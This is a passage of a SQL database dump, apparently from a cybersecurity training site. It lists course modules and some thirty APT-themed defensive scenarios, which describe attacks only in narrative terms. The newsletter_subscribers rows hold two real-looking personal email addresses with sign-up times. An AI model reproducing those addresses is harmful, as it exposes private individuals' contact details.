(132, 12, 'Module 2: Traffic Analysis (Wireshark)', 'Learn how to use Wireshark to inspect packets, filter traffic, and reconstruct network events.', 0, 2, NULL, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
(133, 12, 'Module 3: Network Attacks (Spoofing, MITM)', 'Understand how attackers exploit network protocols to intercept data, redirect traffic, and disrupt services.', 0, 3, NULL, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55'),
(134, 12, 'Module 4: Firewalls & IDS/IPS', 'Learn how to defend networks using Firewalls, Intrusion Detection Systems, and Intrusion Prevention Systems.', 0, 4, NULL, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55');

-- --------------------------------------------------------

--
-- Table structure for table `newsletter_subscribers`
--

CREATE TABLE `newsletter_subscribers` (
  `id` int(11) NOT NULL,
  `email` varchar(255) NOT NULL,
  `subscribed_at` datetime DEFAULT current_timestamp(),
  `is_active` tinyint(1) DEFAULT 1
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

--
-- Dumping data for table `newsletter_subscribers`
--

INSERT INTO `newsletter_subscribers` (`id`, `email`, `subscribed_at`, `is_active`) VALUES
(1, 'fdmtsknsy@gmail.com', '2026-01-22 02:42:12', 1),
(2, 'derrickngugi130@gmail.com', '2026-03-14 00:51:52', 1);

-- --------------------------------------------------------

--
-- Table structure for table `notifications`
--

CREATE TABLE `notifications` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `message` text DEFAULT NULL,
  `is_read` tinyint(1) DEFAULT 0,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp()
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

-- --------------------------------------------------------

--
-- Table structure for table `operations`
--

CREATE TABLE `operations` (
  `id` int(11) NOT NULL,
  `title` varchar(255) NOT NULL,
  `apt_group` varchar(255) DEFAULT NULL,
  `description` text DEFAULT NULL,
  `story_intro` text DEFAULT NULL,
  `difficulty_level` varchar(50) DEFAULT NULL,
  `display_order` int(11) DEFAULT 0,
  `is_active` tinyint(1) DEFAULT 1,
  `is_premium` tinyint(1) DEFAULT 0,
  `passing_grade` int(11) DEFAULT 60,
  `time_limit_hours` int(11) DEFAULT NULL,
  `tags` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL,
  `scenario_prompt` text DEFAULT NULL,
  `total_alerts` int(11) DEFAULT 0,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp(),
  `seo_title` varchar(255) DEFAULT NULL,
  `seo_description` text DEFAULT NULL,
  `slug` varchar(255) DEFAULT NULL,
  `min_level` int(11) DEFAULT 1
) ;

--
-- Dumping data for table `operations`
--

INSERT INTO `operations` (`id`, `title`, `apt_group`, `description`, `story_intro`, `difficulty_level`, `display_order`, `is_active`, `is_premium`, `passing_grade`, `time_limit_hours`, `tags`, `scenario_prompt`, `total_alerts`, `created_at`, `seo_title`, `seo_description`, `slug`, `min_level`) VALUES
(1, 'Operation Iron Grid', 'Sandworm (Russian GRU)', 'Investigate a massive power outage affecting critical infrastructure. Use OT/ICS forensics to track the attacker\'s pivot from the corporate IT network into the SCADA control systems using BlackEnergy malware variants.\n', '', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[]\\\"\"', '', 5, '2025-12-31 13:08:59', NULL, NULL, 'operation-iron-grid', 1),
(2, 'Operation Silent Tsunami', 'Lazarus Group (North Korea)', 'A major decentralized finance (DeFi) platform has been drained of $600M. Trace the laundered cryptocurrency through mixer services and analyze the social engineering campaign that targeted developers with weaponized job offers.\n', '', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[]\\\"\"', '', 4, '2025-12-31 13:42:03', NULL, NULL, 'operation-silent-tsunami', 1),
(3, 'Operation Glass Serpent', 'APT41 (Barium)', 'A distinct supply chain attack compromising a popular server management software. Identify the malicious DLL injection in the signed update package and track the actor\'s dual-mission of espionage and financial theft across victim networks.\n', '', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[]\\\\\\\"\\\"\"', '', 4, '2025-12-31 13:44:55', 'Operation Glass Serpent', 'A distinct supply chain attack compromising a popular server management software. Identify the malicious DLL injection in the signed update package and track the actor\'s dual-mission of espionage and financial theft across victim networks.\n', 'operation-glass-serpent', 1),
(4, 'Operation Phantom Ballot', 'APT28 (Fancy Bear)', 'Uncover a disinformation and spear-phishing campaign targeting political organizations ahead of a national election. Analyze leaked documents, track domain infrastructure used for credential harvesting, and identify the OAuth token abuse techniques.\n', '', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"\\\\\\\\\\\\\\\"[]\\\\\\\\\\\\\\\"\\\\\\\"\\\"\"', '', 4, '2025-12-31 15:16:16', 'Operation Phantom Ballot', 'Uncover a disinformation and spear-phishing campaign targeting political organizations ahead of a national election. Analyze leaked documents, track domain infrastructure used for credential harvesting, and identify the OAuth token abuse techniques.\n', 'operation-phantom-ballot', 1),
(5, 'Operation Black Harvest', 'Wizard Spider (Ryuk/Conti)', 'Respond to a catastrophic ransomware attack paralyzing a regional hospital network. Recover patient data from shadow copies, identify the initial access broker\'s entry point via TrickBot, and trace the lateral movement using Cobalt Strike beacons.', '', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[]\\\\\\\"\\\"\"', '', 5, '2025-12-31 15:21:18', 'Operation Black Harvest', 'Respond to a catastrophic ransomware attack paralyzing a regional hospital network. Recover patient data from shadow copies, identify the initial access broker\'s entry point via TrickBot, and trace the lateral movement using Cobalt Strike beacons.', 'operation-black-harvest', 1),
(6, 'Operation Golden Ticket', 'Carbanak / FIN7', 'A global banking heist involving the manipulation of ATM withdrawal limits and SWIFT transaction gateways. Analyze the specialized administrative tools used by the attackers to impersonate bank clerks and authorize fraudulent transfers.\n', '', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[]\\\"\"', '', 4, '2025-12-31 15:22:51', 'Operation Golden Ticket', 'A global banking heist involving the manipulation of ATM withdrawal limits and SWIFT transaction gateways. Analyze the specialized administrative tools used by the attackers to impersonate bank clerks and authorize fraudulent transfers.\n', 'operation-golden-ticket', 1),
(7, 'Operation Desert Mirage', 'APT34 (OilRig)', 'A simulated cyber operation led by the APT34 group aimed at infiltrating a multinational energy corporation to exfiltrate sensitive geological data.', 'In this scenario, participants will defend against a targeted cyber attack by APT34, also known as OilRig. The group is known for its focus on the energy sector, and they are suspected to be backed by a nation-state. The exercise will challenge participants to identify and mitigate threats across multiple stages of an advanced persistent threat operation.', 'intermediate', 0, 1, 1, 60, NULL, '[]', '', 5, '2026-01-02 04:27:59', NULL, NULL, 'operation-desert-mirage', 1),
(8, 'Operation Silent Harvest', 'APT10 (Stone Panda)', 'This training scenario simulates a cyber attack by APT10 (Stone Panda), known for its sophisticated cyber espionage campaigns. Participants will navigate through a series of alerts representing different stages of an attack, aiming to understand and mitigate each threat effectively.', 'In recent months, there has been an increase in suspicious activities targeting a fictional multinational corporation, TechGlobal Inc. Intelligence suggests that APT10 is behind these attacks, with the intent to exfiltrate sensitive intellectual property and confidential business data. Your task is to identify and neutralize the threats as they unfold.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[]\\\\\\\"\\\"\"', '', 5, '2026-01-02 20:23:41', NULL, NULL, 'operation-silent-harvest', 1),
(9, 'Operation Infinite Loop', 'Equation Group / Lamberts', 'Analyze a sophisticated firmware implant discovered on enterprise firewalls. This advanced persistent threat persists across reboots and OS re-installations. Conduct low-level forensic analysis of the SPI flash memory to extract the payload.', '', 'advanced', 0, 1, 1, 60, NULL, '[]', NULL, 10, '2026-01-02 20:26:53', NULL, NULL, 'operation-infinite-loop', 1),
(10, 'Operation Ocean Lotus', 'APT32 (OceanLotus)', 'A targeted watering hole attack on a human rights organization\'s website. Users are infected with a custom backdoor upon visiting the site. Analyze the obfuscated JavaScript payload and the subsequent macOS malware deployment.\n', '', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"\\\\\\\\\\\\\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"[]\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"\\\\\\\\\\\\\\\"\\\\\\\"\\\"\"', '', 5, '2026-01-02 20:30:06', 'Operation Ocean Lotus', 'A targeted watering hole attack on a human rights organization\'s website. Users are infected with a custom backdoor upon visiting the site. Analyze the obfuscated JavaScript payload and the subsequent macOS malware deployment.\n', 'operation-ocean-lotus', 1),
(11, 'Operation Radiant Horizon', 'Hafnium (China)', 'Train in identifying and mitigating Hafnium\'s exploitation of Exchange servers using ProxyLogon and China Chopper.', 'In early 2021, organizations worldwide faced a sophisticated onslaught by Hafnium, a Chinese state-sponsored APT group. This scenario puts you in the shoes of a cyber defense team responding to a mass exploitation event targeting on-premise Exchange servers. Your mission: analyze web shell artifacts, uncover the chain of zero-day vulnerabilities used for initial access, and determine the scope of data exfiltration. This advanced training will test your skills in real-world threat detection and incident response.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Hafnium\\\\\\\",\\\\\\\"ProxyLogon\\\\\\\",\\\\\\\"China Chopper\\\\\\\",\\\\\\\"Exchange Server Exploitation\\\\\\\",\\\\\\\"Cybersecurity Training\\\\\\\"]\\\"\"', '', 8, '2026-01-03 00:02:24', 'Advanced Response to Hafnium\'s Mass Exploitation of Exchange Servers', 'Train in identifying and mitigating Hafnium\'s exploitation of Exchange servers using ProxyLogon and China Chopper.', 'operation-radiant-horizon', 1),
(12, 'Operation Silent Star', 'Turla (Snake / Uroburos)', 'Investigate Turla\'s hijacking of satellite links to mask C2 locations using rootkits on diplomatic networks.', 'In a world where digital espionage knows no bounds, the notorious Turla group has taken cyber warfare to new heights. By hijacking commercial satellite internet links, they\'ve crafted an insidious method to conceal their command and control locations. As a cyber threat analyst, your mission is to dismantle this operation by tracing the hijacked downstream traffic and unearthing the sophisticated rootkit deployed within diplomatic networks. Can you unravel the layers of deception and thwart Turla\'s ambitions?', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Turla APT\\\\\\\",\\\\\\\"cyber espionage\\\\\\\",\\\\\\\"satellite hijacking\\\\\\\",\\\\\\\"network security\\\\\\\",\\\\\\\"rootkit analysis\\\\\\\"]\\\"\"', '', 5, '2026-01-03 00:36:50', 'Operation Satellite Serpent: Uncovering Turla\'s Covert Channels', 'Investigate Turla\'s hijacking of satellite links to mask C2 locations using rootkits on diplomatic networks.', 'operation-silent-star', 1),
(13, 'Operation Dragon Breath', 'APT40 (Periscope)', 'Uncover APT40\'s tactics in stealing maritime research data via compromised servers and custom malware.', 'In an unprecedented cyber breach, APT40 has targeted a naval engineering university, stealing sensitive maritime research data. Analysts must uncover how compromised web servers were used as relay points and analyze the custom malware deployed to exfiltrate proprietary sonar technology schematics. This operation requires a keen understanding of APT40\'s tactics and technical prowess to unravel their sophisticated attack chain.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"APT40\\\\\\\",\\\\\\\"cybersecurity training\\\\\\\",\\\\\\\"maritime data breach\\\\\\\",\\\\\\\"custom malware\\\\\\\",\\\\\\\"threat analysis\\\\\\\"]\\\"\"', '', 5, '2026-01-03 00:41:42', 'Investigating APT40\'s Maritime Data Heist', 'Uncover APT40\'s tactics in stealing maritime research data via compromised servers and custom malware.', 'operation-dragon-breath', 1),
(14, 'Operation Wasted Locker', 'Evil Corp (Indrik Spider)', 'Engage in simulated ransomware negotiation and decryption against Evil Corp in this advanced cybersecurity training scenario.', 'In a high-stakes cybersecurity operation, a Fortune 500 company falls victim to a sophisticated ransomware attack by the notorious APT group, Evil Corp. As the company\'s data is held hostage, your team is tasked with negotiating with the attackers while simultaneously reverse-engineering the malware to identify a vulnerability in its encryption. The initial infection vector is traced back to a cunning drive-by download, demonstrating Evil Corp\'s technical prowess. Can you outsmart the attackers, recover the data, and trace the attack back to its source?', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"ransomware\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Evil Corp\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"APT\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"malware analysis\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 7, '2026-01-03 00:49:14', 'Evil Corp Ransomware Negotiation and Decryption Challenge', 'Engage in simulated ransomware negotiation and decryption against Evil Corp in this advanced cybersecurity training scenario.', 'operation-wasted-locker', 1),
(15, 'Operation Soft Cell', 'Gallium (Soft Cell)', 'Beginner-level scenario to detect and remediate Gallium APT\'s long-term intrusion in telecoms capturing call records.', 'In this training scenario, participants will dive into the covert world of cyber espionage as they work to uncover and disrupt Gallium APT\'s intrusion into global telecommunications networks. The attackers are meticulously capturing Call Detail Records of high-value targets, using stealthy web shells and \'living off the land\' tactics to remain undetected. Trainees will learn to identify these threats and employ effective remediation strategies.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"Gallium APT\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"telecommunications security\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"web shell detection\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cyber threat intelligence\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"call detail record\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-03 00:53:35', 'Gallium APT: Telecom Intrusion Detection Training', 'Beginner-level scenario to detect and remediate Gallium APT\'s long-term intrusion in telecoms capturing call records.', 'operation-soft-cell', 1),
(16, 'Operation Rabid Dog', 'MuddyWater (Static Kitten)', 'Uncover and mitigate MuddyWater\'s destructive wiper attack disguised as ransomware against a government agency.', 'In the heart of a bustling government agency, a seemingly routine email arrives, carrying a sinister payload. The notorious APT group MuddyWater, known for their cunning tactics, has launched a deceptive wiper attack, masquerading as ransomware. The operation requires the team to dissect the macro-enabled document that serves as the initial vector, analyze the embedded \'POWERSTATS\' backdoor, and extract critical forensic artifacts before the destructive wiping logic can execute. The race against the clock is on, as every second counts in preventing irreversible damage.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"MuddyWater\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"wiper attack\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"ransomware\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"APT\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 10, '2026-01-03 23:50:48', 'MuddyWater\'s Deceptive Wiper Attack on Government Infrastructure', 'Uncover and mitigate MuddyWater\'s destructive wiper attack disguised as ransomware against a government agency.', 'operation-rabid-dog', 1),
(17, 'Operation Horizon', 'APT1 ', 'Engage in a beginner-friendly cyber operation simulation featuring APT1\'s well-known tactics and techniques.', 'In this training scenario, participants will dive into a simulated cyber espionage operation orchestrated by the notorious APT1 group. Known for its sophisticated attacks and persistence, APT1 has launched a new campaign targeting a fictional global manufacturing company. Trainees will navigate through realistic alerts to identify and mitigate threats, gaining insights into APT1\'s tactics, techniques, and procedures (TTPs) as they progress through the attack lifecycle.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"APT1 operation\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"beginner cyber scenario\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"threat intelligence\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cyber espionage\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-04 00:58:38', 'APT1 Cyber Espionage Scenario: Beginner\'s Threat Simulation', 'Engage in a beginner-friendly cyber operation simulation featuring APT1\'s well-known tactics and techniques.', 'operation-horizon', 1),
(18, 'Operation Gothic Panda', 'APT3 (Gothic Panda)', 'Train to counter APT3\'s sophisticated cyberattack, simulating their known TTPs in a realistic, intermediate-level scenario.', 'In this scenario, your organization is targeted by APT3, also known as Gothic Panda, a notorious cyber espionage group. Known for their sophisticated techniques and extensive resource access, APT3 has set its sights on exfiltrating your company\'s sensitive data. Your mission is to navigate through a series of alerts, utilizing threat intelligence and defensive strategies to thwart their multi-stage infiltration attempt.', 'Intermediate', 0, 1, 1, 60, NULL, '\"[]\"', '', 5, '2026-01-04 02:06:57', 'Defend Against Gothic Panda\'s Multi-Stage Infiltration', 'Train to counter APT3\'s sophisticated cyberattack, simulating their known TTPs in a realistic, intermediate-level scenario.', 'operation-gothic-panda', 1),
(19, 'Operation Red Apollo', 'APT10 (MenuPass)', 'Explore APT10\'s DLL side-loading techniques in a complex aerospace sector espionage campaign.', 'In the ever-evolving landscape of cyber threats, APT10, also known as MenuPass, has launched a sophisticated espionage campaign targeting the aerospace industry. Leveraging DLL side-loading techniques, the threat actors aim to infiltrate, persist, and exfiltrate critical intellectual property, including large CAD files, to gain a competitive edge in aerospace technology.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"APT10\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"DLL Side-Loading\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Aerospace Espionage\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Cybersecurity Training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Intellectual Property Theft\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 7, '2026-01-04 02:13:24', 'APT10\'s Aerospace Espionage - DLL Side-Loading Tactics', 'Explore APT10\'s DLL side-loading techniques in a complex aerospace sector espionage campaign.', 'operation-red-apollo', 1),
(20, 'Operation Whitefly', 'Whitefly (Singapore-based?)', 'Investigate Whitefly APT\'s breach using Vcrodat malware in the healthcare sector, focusing on persistence and compromised open-source tools.', 'In this advanced scenario, analysts are tasked with investigating a sophisticated breach within the healthcare and materials science sectors. The notorious Whitefly APT group has employed their custom Vcrodat malware to maintain persistence while cleverly blending their malicious activities with legitimate developer behaviors by compromising open-source tools. Participants will need to piece together clues from multiple alerts to unravel the attackers\' tactics, techniques, and procedures.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Whitefly APT\\\\\\\",\\\\\\\"Vcrodat malware\\\\\\\",\\\\\\\"cybersecurity training\\\\\\\",\\\\\\\"healthcare breach\\\\\\\",\\\\\\\"open-source compromise\\\\\\\"]\\\"\"', '', 7, '2026-01-04 02:14:54', 'Advanced Breach Investigation: Whitefly APT in Healthcare', 'Investigate Whitefly APT\'s breach using Vcrodat malware in the healthcare sector, focusing on persistence and compromised open-source tools.', 'operation-whitefly', 1),
(21, 'Operation Silent Shield', 'Kimsuky (Velvet Chollima)', 'Explore Kimsuky\'s use of malicious browser extensions and BabyShark malware in a targeted spear-phishing campaign.', 'In a rapidly evolving cyber landscape, the global think tank specializing in nuclear policy finds itself under siege. The notorious APT group Kimsuky, known for its advanced tactics, has launched a spear-phishing campaign employing malicious browser extensions and the insidious BabyShark malware. As a beginner analyst, your mission is to unravel the layers of this attack, tracing each step from initial access to data exfiltration, and fortifying defenses against future threats.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"Kimsuky APT\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"spear-phishing\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"BabyShark malware\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"nuclear policy\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-04 02:18:07', 'Kimsuky Spear-Phishing Tactics Against Nuclear Policy Think Tanks', 'Explore Kimsuky\'s use of malicious browser extensions and BabyShark malware in a targeted spear-phishing campaign.', 'operation-silent-shield', 1),
(22, 'Operation Double Dragon', 'APT41 (Double Dragon)', 'Investigate APT41\'s dual-mode operation targeting gaming source code and PII for espionage.', 'In this advanced training scenario, participants will track APT41, a notorious cyber threat actor known for conducting both state-sponsored espionage and financially-motivated attacks. The operation begins with the theft of strategic game source code for profit and pivots to a more sinister goal: accessing databases containing citizens\' PII. As they unravel this complex operation, participants will navigate through sophisticated supply chain attacks and lateral movements emblematic of APT41\'s tactics, techniques, and procedures.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"APT41\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Cyber Espionage\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Gaming Industry\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Supply Chain Attack\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"PII Theft\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-04 02:21:13', 'APT41: Dual-Mode Cyber Operation Training', 'Investigate APT41\'s dual-mode operation targeting gaming source code and PII for espionage.', 'operation-double-dragon', 1),
(23, 'Operation Red Echo', 'APT41 / RedEcho', 'Engage with APT41 tactics in Operation Red Echo, a realistic cyber defense scenario for intermediate analysts.', 'In this immersive training scenario, participants are tasked with defending a fictional telecom company under siege by the notorious APT41, known as RedEcho. This advanced persistent threat group, originating from China, has launched a multi-vector attack, leveraging their expertise in supply chain compromises and ransomware to infiltrate the company\'s network. Your mission is to detect, analyze, and mitigate the threats as they unfold in a five-step attack sequence. Can you thwart RedEcho\'s espionage and financial motives before critical data is exfiltrated?', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"APT41\\\\\\\",\\\\\\\"RedEcho\\\\\\\",\\\\\\\"Cyber Defense Training\\\\\\\",\\\\\\\"Intermediate Cybersecurity\\\\\\\",\\\\\\\"Supply Chain Attack\\\\\\\"]\\\"\"', '', 5, '2026-01-04 04:11:04', 'Operation Red Echo: Intermediate Cyber Defense Training', 'Engage with APT41 tactics in Operation Red Echo, a realistic cyber defense scenario for intermediate analysts.', 'operation-red-echo', 1),
(24, 'Operation Pipeline Shut', 'DarkSide', 'Learn to defend against DarkSide with this beginner operation: Pipeline Shut, designed for cybersecurity training.', 'In the wake of increasing cyber threats, DarkSide has targeted a major energy pipeline. As part of the security team, you must identify and mitigate their efforts. This operation will take you through the critical stages of an attack, from initial access to data exfiltration.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"DarkSide\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"pipeline security\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"beginner threat detection\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"APT\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-04 04:13:17', 'Operation Pipeline Shut: Training Scenario Against DarkSide', 'Learn to defend against DarkSide with this beginner operation: Pipeline Shut, designed for cybersecurity training.', 'operation-pipeline-shut', 1),
(25, 'Operation Kinetic Strike', 'REvil (Sodinokibi)', 'Intermediate cybersecurity operation simulating REvil\'s tactics for effective threat response training.', 'In the wake of escalating ransomware attacks, Operation Kinetic Strike challenges your cybersecurity team to defend against REvil, a notorious APT group. Your mission is to detect and mitigate their attack as they compromise a fictional corporation\'s network. Stay vigilant as REvil employs sophisticated techniques in a bid to encrypt sensitive data and demand a hefty ransom.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"REvil Ransomware\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Cybersecurity Training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"APT Group Simulation\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Threat Detection\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Ransomware Defense\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-04 04:24:42', 'Operation Kinetic Strike: REvil Ransomware Simulation', 'Intermediate cybersecurity operation simulating REvil\'s tactics for effective threat response training.', 'operation-kinetic-strike', 1),
(26, 'Operation File Transfer', 'Cl0p (TA505)', 'Engage in an advanced simulation against Cl0p (TA505), focusing on their sophisticated file transfer tactics.', 'In the midst of a bustling financial quarter, your organization receives a tip-off about Cl0p (TA505) targeting your infrastructure. This notorious APT group is known for their adeptness in exploiting network vulnerabilities for massive data exfiltration. As part of the cybersecurity team, you must thwart their Operation File Transfer before critical data falls into the wrong hands.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"Cl0p APT\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"advanced threat simulation\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"file transfer security\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-04 04:37:17', 'Operation File Transfer: Cl0p\'s Advanced Tactics', 'Engage in an advanced simulation against Cl0p (TA505), focusing on their sophisticated file transfer tactics.', 'operation-file-transfer', 1),
(27, 'Operation Midnight Storm', 'Nobelium (Midnight Blizzard)', 'Train on detecting and mitigating Nobelium\'s cloud-based identity attacks targeting diplomatic entities.', 'In a world of escalating cyber threats, a new wave of attacks has emerged, targeting diplomatic entities through sophisticated cloud identity compromises. Nobelium, the notorious APT group linked to Russia\'s SVR, has launched a campaign using advanced techniques like password spraying and token theft to bypass MFA. Your mission is to investigate these breaches, uncover rogue OAuth applications, and secure the compromised systems.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Nobelium\\\",\\\"cloud security\\\",\\\"identity compromise\\\",\\\"APT29\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-01-04 23:54:35', 'Nobelium Cloud Identity Compromise Simulation', 'Train on detecting and mitigating Nobelium\'s cloud-based identity attacks targeting diplomatic entities.', 'operation-midnight-storm', 1),
(28, 'Operation Volt Strike', 'Volt Typhoon', 'Train to detect Volt Typhoon\'s stealthy living off the land tactics using built-in Windows tools in critical infrastructure.', 'In the world of cyber espionage, stealth is paramount. Volt Typhoon, a notorious APT group, has launched a covert operation targeting critical infrastructure sectors. Their modus operandi: blending in with legitimate administrative activity using only native Windows tools. As a cybersecurity analyst, your mission is to uncover this clandestine campaign, piecing together subtle clues that reveal their presence. Can you follow the trail and mitigate the threat before it\'s too late?', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Volt Typhoon\\\",\\\"cybersecurity training\\\",\\\"LOLBins\\\",\\\"critical infrastructure\\\",\\\"advanced threat detection\\\"]\"', '', 5, '2026-01-04 23:56:24', 'Advanced Detection of LOLBins in Critical Infrastructure by Volt Typhoon', 'Train to detect Volt Typhoon\'s stealthy living off the land tactics using built-in Windows tools in critical infrastructure.', 'operation-volt-strike', 1),
(29, 'Operation Charming Charter', 'Charming Kitten (Phosphorus)', 'Analyze Charming Kitten\'s social engineering campaign targeting journalists via WhatsApp and email using DownPaper backdoor.', 'In recent months, the notorious APT group Charming Kitten has intensified its operations, targeting journalists and human rights activists. Using social engineering tactics via WhatsApp and email, they aim to infiltrate networks and extract sensitive information. This operation focuses on analyzing the DownPaper backdoor and the credential harvesting tactics disguised as legitimate interview requests.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Charming Kitten\\\\\\\",\\\\\\\"social engineering\\\\\\\",\\\\\\\"DownPaper\\\\\\\",\\\\\\\"credential harvesting\\\\\\\"]\\\"\"', '', 5, '2026-01-04 23:58:37', 'Charming Kitten Social Engineering and DownPaper Analysis', 'Analyze Charming Kitten\'s social engineering campaign targeting journalists via WhatsApp and email using DownPaper backdoor.', 'operation-charming-charter', 1),
(30, 'Operation Fox Hunt', 'Fox Kitten', 'Experience Fox Kitten\'s APT exploitation of VPN concentrators to infiltrate and compromise domain controllers.', 'In this scenario, the notorious Fox Kitten APT group targets unpatched VPN concentrators, swiftly penetrating corporate networks. Once inside, they rapidly deploy web shells and move laterally to compromise the domain controller, dumping critical credentials and paving the way for further exploitation. Participants must identify and neutralize the threat to protect sensitive enterprise environments.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Fox Kitten\\\\\\\",\\\\\\\"VPN Exploit\\\\\\\",\\\\\\\"Domain Controller\\\\\\\",\\\\\\\"Cybersecurity Training\\\\\\\",\\\\\\\"APT\\\\\\\"]\\\"\"', '', 7, '2026-01-05 00:00:59', 'Fox Kitten\'s VPN Exploit and Domain Controller Breach', 'Experience Fox Kitten\'s APT exploitation of VPN concentrators to infiltrate and compromise domain controllers.', 'operation-fox-hunt', 1),
